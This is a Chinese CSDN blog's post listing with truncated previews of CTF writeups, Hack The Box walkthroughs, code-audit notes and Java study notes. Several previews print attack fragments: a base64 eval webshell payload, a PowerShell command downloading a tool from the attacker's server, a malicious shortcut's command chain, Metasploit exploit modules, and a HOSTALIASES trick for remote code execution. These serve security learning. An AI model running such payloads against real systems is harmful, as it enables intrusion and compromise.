- 博客(151)
- 资源 (1)
- 收藏
- 关注
原创 2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_phpMiscSimpleFlow看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包后面的包里面发现flag.zip但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量@eval(@base64_decode($_POST['m8f8d9db647ecd']));&e57fb9c067c677=o3&g479cf6f058c
2022-04-25 18:59:14 2398
原创 [*CTF2022]oh_my_lotto_revenge
New相对于oh_my_lotto,revenge进行了下面的更改这么做,我们能走的就只有RCE了,而这里唯一能操作的一个地方就是这里,可以操作环境变量os.environ[lotto_key] = lotto_value这里有几个非预期解,先看看预期解Intented writeup这里可以操控环境变量,那么我们能做的事情就很多了,预期解是操控HOSTALIASES修改hosts因为他的wget是通过域名下载的os.system('wget --content-disposition
2022-04-21 18:58:26 2929 1
原创 [Hack The Box]靶机8 Optimum
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看打开是HFS,nmap扫出来是HFS2.3这个版本的HFS是有cve的https://nvd.nist.gov/vuln/detail/CVE-2014-6287msf有这个模块直接拿下shell拿到user.txt进不了admin,需要提权本地起一个python服务,把winpeas传上去powershell -c "(new-object System.Net.WebClient).Dow.
2022-04-01 20:55:09 526
原创 [Hack The Box]靶机6 Legacy && 靶机7 Blue
老规矩,namp一把嗦扫端口开启了139,445和3389,web都没开一个,那肯定得从其他方面下手了从namp结果看起来,貌似得从smb这里下手直接用nmap进行漏扫nmap --script=vuln 10.10.10.4这里都直接扫出来了,ms17-010,msf可以打的直接拿到shell权限也都是admin,直接拿下两个flag...
2022-04-01 00:19:13 3777
原创 [Java安全]类加载器ClassLoader
前言借用了先知社区的文章的一张图来解释这个原理负责动态加载Java类到Java虚拟机的内存空间中,用于加载系统、网络或者其他来源的类文件。Java源代码通过javac编译器编译成类文件,然后JVM来执行类文件中的字节码来执行程序。类加载器介绍类加载器大致分为两类:JVM 默认类加载器用户自定义类加载器类加载器分类引导类加载器(BootstrapClassLoader):属于jvm一部分,不继承java.lang.ClassLoader类,也没有父加载器,主要负责加载核心java库(即
2022-03-30 01:56:15 290
原创 [Hack The Box]靶机4 Jerry
首先用nmap进行端口扫描,看到只开启了8080端口,是Tomcat给出的是默认界面dirmap扫描了一下目录去manager管理页面看看,他需要认证他提示密码为s3cret,试了一下真是这个,倒省事了,不用我自己爆破进tomcat的后台就好弄了哦,getshell方法多的是,这里写的挺多的,这里我选择直接用是msf打,方便点use exploit/multi/http/tomcat_mgr_upload直接打通在Administrator的桌面发现flagcd C:.
2022-03-29 17:26:48 552
原创 [Hack The Box]靶机3 Lame
配置好hosts,这里有laboratory.htb和git.laboratory.htbnamp一把嗦,扫出22、80、443端口
2022-03-28 11:48:50 299
原创 [Hack The Box]靶机2 Backdoor
nmap先嗦一把,开了22端口、80端口和1337端口访问是一个wordpress博客网站wpscan扫一下版本是5.8.1再看看网站,这里会跳转backdoor.htb,配置一下hostsecho 10.10.11.125 backdoor.htb >> /etc/hosts扫一下目录这里有目录遍历这里有一个eBook-download的插件在readme里面看到版本信息,找找看有没有什么漏洞版本好像是1.1的确有漏洞,任意文件下载拿到一个数据库的.
2022-03-25 14:20:46 3182
原创 [Hack The Box] 靶机1 Meow+Paper
前言久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干这次就算是对这个平台的一个熟悉操作吧Meow下载到了open文件,kali连接上然后测试一下可以ping通了然后就开nmap跑nmap -sV 10.129.160.90开启了23端口,telnet服务,直接连接,root账户直接拿flag这个算是白给的Paper下面就开始打正式的靶机了一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
2022-03-24 22:20:02 1870 1
原创 [HMGCTF2022]wp
WEBFan website首先是一个www.zip的源码泄露,是laminas框架mvc的框架首先就是看路由在\module\Album\src\Controller\AlbumController.php里面有功能点<?phpnamespace Album\Controller;use Album\Model\AlbumTable;use Laminas\Mvc\Controller\AbstractActionController;use Laminas\View\Mode
2022-03-24 17:58:34 4227
原创 [Java安全] 反射
前言准备入手学习java的安全了,感觉这也是一个大的趋势,想着尽早进入到java安全的探索中,在反序列化链的学习之前,需要先学习反射,不多说了,开干吧反射反射定义对象可以通过反射获取他的类,类可以通过反射拿到所有⽅法(包括私有)通过java语言中的反射机制可以操作字节码文件,可以读和修改字节码文件反射的基本运用1. 获取类对象a. forName()方法只需要知道类名,在加载JDBC的时候会采用实例代码public class test1 { public static voi
2022-03-06 22:50:43 6049 5
原创 [SCTF2021]Upload_it_1复现闭包组件反序列化rce
题目地址SycloverTeam提供了题目的docker环境https://github.com/SycloverTeam/SCTF2021/tree/master/web/Upload_it_1wp首先题目给了composer.json{ "name": "sctf2021/upload", "authors": [ { "name": "AFKL", "email": "upload@qq.com"
2022-02-11 22:44:49 3468
原创 [HWS&DasCTF]misc
babypdf附件是一个快捷方式,但是打开是可以成功的看到pdf的,这就肯定是从外面加载进来的看一下目标%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y&findstr
2022-01-28 18:42:02 1149 1
原创 [Java多线程]线程创建的三种方式,线程的互斥,线程的同步
前言多线程:指的是这个程序(一个进程)运行时产生了不止一个线程并行和并发:并行:多个cpu实例或者多台机器同时执行一段处理逻辑,是真正的同时。并发:通过cpu调度算法,让用户看上去同时执行,实际上从cpu操作层面不是真正的同时。并发往往在场景中有公用的资源,那么针对这个公用的资源往往产生瓶颈,我们会用TPS或者QPS来反应这个系统的处理能力。线程创建最基础的主要分为两种方法继承Thread类实现Runnable接口创建Thread类的子类,用这种方法生成新线程,可以按以下步骤进行:
2021-12-01 19:22:39 715
原创 [2021极客大挑战]部分wp
Where_is_my_FUMO开局是给了一个反弹shell的命令执行<?phpfunction chijou_kega_no_junnka($str) { $black_list = [">", ";", "|", "{", "}", "/", " "]; return str_replace($black_list, "", $str);}if (isset($_GET['DATA'])) { $data = $_GET['DATA']; $add
2021-11-30 08:26:19 3844
原创 [代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
前言漏洞存在版本,分为两大版本:ThinkPHP 5.0-5.0.24ThinkPHP 5.1.0-5.1.30环境搭建composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist修改composer.json"require": { "php": ">=5.4.0", "topthink/framework": "5.0.5"},执行composer update
2021-11-26 01:08:14 5562 3
原创 [西湖论剑]yuas的秘密wp
yusa的秘密filescan找到了一个contack文件,提示到了便筏dump出便筏的数据文件开一个win7虚拟机,打开便筏数据文件存放的地址C:\Users\Administrator\AppData\Roaming\Microsoft\Sticky Notes导入snt文件,然后看到便筏内容,世界没了心跳试了一轮,这个密码可以打开key.zip里面的内容是from PIL import Imageimport structpic = Image.open('key.bmp'
2021-11-22 13:13:34 873 1
原创 [Java GUI]几种计算器的实现
按键为操作符import javax.swing.*;import java.awt.*;import java.awt.event.ActionEvent;import java.awt.event.ActionListener;public class Work2 extends JFrame implements ActionListener { private JButton bt_add,bt_sub,bt_mul,bt_div; private JTextField
2021-11-17 10:18:34 222
原创 [Java GUI]学习笔记
JFrame常用方法// 设置窗口的 标题void setTitle(String title)// 设置窗口的 图标void setIconImage(Image image)// 设置窗口的 宽高void setSize(int width, int height)void setSize(Dimension d)/** * 设置窗口关闭按钮点击后的默认操作, 参考值: * WindowConstants.DO_NOTHING_ON_CLOSE: 不执行任何操作。
2021-11-17 09:56:08 388
原创 [代码审计]ThinkPHP5的文件包含漏洞
漏洞影响范围加载模版解析变量时存在变量覆盖问题,导致文件包含漏洞的产生漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10tp框架搭建tp框架由两部分组成应用项目: https://github.com/top-think/think核心框架: https://github.com/top-think/framework框架下载好后,需要更名为thinkphp访问localhost/tp5.0.1/publi
2021-11-03 02:06:48 1237
原创 [红日靶场]ATT&CK实战系列——红队实战(—)
环境搭建靶场地址该靶场给了三台虚拟机下载好分别开启,密码都是hongrisec@2019,登录后需要修改密码,我这里修改的hongri@2019靶场环境是这样的web服务器由win7来搞,网络可以按照官方给的配置但由于我习惯了用自己的windows打,所以我把win7设置成nat,另一个网络设成vm1另外两个虚拟机的网络适配器都设置成vm1NAT的子网是192.168.159.0/24在win7里面的phpstudy打开服务成功访问以上就已经搭建好了环境了WEB服务渗透n
2021-10-17 15:34:58 999
原创 [2021江西省赛高校组]wp
easyphp前端代码泄露foreach ($_POST as $item => $value){ $$item=$$value; $secret = $$item;}foreach ($_GET as $key => $value){ if ($key=='flag'){ $str=$value; $$str=$secret; }}if (isset($hehe)){ echo "<center>"
2021-09-28 01:30:27 1387 2
原创 [2021强网杯青少年]ssrf+fpm
best_php<?phphighlight_file(__FILE__);//like fpm?class Crawl{ public $url; function __construct($url){ if(substr($url,0,7)==="http://"){ $this->url = $url; }else{ $this->url = "http://127.0.0.1/"
2021-09-26 17:37:36 467 1
原创 [Java代码审计]——远程调试初探
Jar包的调试这里以冰蝎做示例把冰蝎的jar包和他必须的db数据库文件放到项目的lib目录下把jar包添加到库如下配置调试配置新建远程JVM调试JVM的命令行参数,根据JDK的版本去选择然后比如在这打一个断点然后在jar包目录下执行如下命令,后面的参数是刚刚配置调试的那个配置注意这里,suspend要改成y,不然会卡不住断点,这个参数的意思是:是否等待调试器的接入回到idea,debug就可以卡住断点了Weblogic的远程调试这里我们是以dacker来配合Idea进行代码
2021-09-18 00:53:53 505
原创 2021第五空间网络安全大赛
WebFTPhttps://github.com/wifeat/WebFTP根据github的源码,去对网站进行分析,有写到初始账号但是题目改了密码,登不进然后下载到题目的Config.php.bak,看到版本是v2.3出现了git泄漏,无法下载到文件,但是看到了目录结构找到探针http://114.115.185.167:32770/Readme/mytz.phphttp://114.115.185.167:32770/Readme/mytz.php?act=phpinfo直接找到f
2021-09-17 17:46:42 1299
原创 [羊城杯2021] wp
baby_volatility直接看镜像文件,查看cmdfilescan找到有一个ssh.txt想到之前搭建博客的时候就接触这个ssh密钥,拿去base64decode找到邮箱,去github找用户在历史commit里面有个这个??RCTF??去分析一下这个__APP__里面有html我直接去kali里面foremost一下打开后找到了一个隐蔽的flag,真难找。。U2FuZ0ZvcntTMF8zYXp5XzJfY3JhY2tfbm9vYl9wbGF5ZXJ9解出签到
2021-09-13 23:49:34 1366 1
原创 [祥云杯2021]几道简单题的wp
ezyiihttps://xz.aliyun.com/t/9948找yii链子打,开局就给了反序列化,看了一下是文章里面的第四条链子exp<?phpnamespace Codeception\Extension{ use Faker\DefaultGenerator; use GuzzleHttp\Psr7\AppendStream; class RunProcess{ protected $output; private $proc
2021-08-22 21:42:40 4406 15
原创 [BUUCTF]刷题记录8
[De1CTF 2019]SSRF Mepython代码审计ssrfhash拓展攻击flask题#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding(
2021-08-21 22:36:48 308
原创 [GKCTF2021]复现wp
签到打开流量包,分析http流用python转成字符串import binasciis = '64306c455357644251306c6e51554e4a5a3046355355737764306c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154586c4a616b31355357704e65556c7154576c44546d3952524
2021-08-21 22:36:12 481
原创 利用PHP的NAN和INF来获取字符串来自增绕过长度限制
最近在一道题目里面学到了一个新的小技巧在php中,字符串是可以递增的,如下:但是不可递减这道题是这样的<?phperror_reporting(0);if ($_GET['looklook']){ highlight_file(__FILE__);}else{ setcookie("hint", "?looklook", time()+3600);}if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf
2021-08-19 00:20:31 975
原创 [CTFshow]吃瓜杯复现wp
热身<?phpinclude("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,
2021-08-19 00:05:12 1072 2
原创 Javaweb学习笔记8(Response对象)
Response对象功能:设置响应消息设置响应行格式:HTTP/1.1 200 ok设置状态码:setStatus(int sc)设置响应头:setHeader(String name, String value)设置响应体:使用步骤:获取输出流字符输出流:PrintWriter getWriter()字节输出流:ServletOutputStream getOutputStream()使用输出流,将数据输出到客户端浏览器重定向创
2021-08-09 23:10:44 160
原创 [CTFshow]吃鸡杯
在?看看密码给了一个vmem文件,内存取证搞密码肯定一开始想到系统用户的密码volatility --profile=Win7SP1x64 -f looklookpassword.vmem hivelistvolatility --profile=Win7SP1x64 -f looklookpassword.vmem hashdump -y 0xfffff8a000024010 -s 0xfffff8a000dd7010找一下竟然没有密码那可能是浏览器里面保存了的密码 volatil
2021-08-06 02:50:00 1170
原创 Python数据结构——上机考试
实现一个链表,并构造一个方法,找到倒数第x个节点的值# 单链表节点创建class LNode: def __init__(self,elem,next = None): self.elem = elem self.next = next# 单链表创建class LList: def __init__(self): self.head = None# 头指针 self.rear = None# 尾指针 s
2021-06-22 00:12:25 487
原创 AFCTF校赛
fake留了一个.git文件,我们看一下日志是有两次提交的,有一次是真的flaggit loggit show 版本号我们再使用git show命令来查看内容stolen打开数据包,追踪tcp流首先看到上传了一个一句话木马然后是一个python文件这个python文件把flag的每一位都转化成ascii码再*16*16+1然后发送流给192.168.159.138再往下看,他执行了这个python文件那么就看他的包的内容,全部提取出来在转换成flag第一个果然是26
2021-06-05 17:34:22 1121
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人